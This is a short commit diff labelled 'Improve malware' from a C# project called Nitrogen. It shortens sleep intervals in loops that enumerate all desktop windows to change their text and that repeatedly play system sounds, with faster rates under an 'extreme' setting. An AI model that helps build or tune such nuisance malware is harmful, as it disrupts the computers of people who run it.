Improve malware
This commit is contained in:
parent
9d3b0d12de
commit
860d5e00d7
|
@ -78,13 +78,13 @@ namespace Nitrogen
|
||||||
while (variables.textchanger == true)
|
while (variables.textchanger == true)
|
||||||
{
|
{
|
||||||
EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero);
|
EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero);
|
||||||
if (variables.extreme == false)
|
if (!variables.extreme)
|
||||||
{
|
{
|
||||||
Thread.Sleep(1000);
|
Thread.Sleep(1000);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
Thread.Sleep(100);
|
Thread.Sleep(10);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -459,6 +459,10 @@ namespace Nitrogen
|
||||||
{
|
{
|
||||||
PlaySystemSound("SystemNotification");
|
PlaySystemSound("SystemNotification");
|
||||||
}
|
}
|
||||||
|
if (variables.extreme)
|
||||||
|
Thread.Sleep(1);
|
||||||
|
else
|
||||||
|
Thread.Sleep(500);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue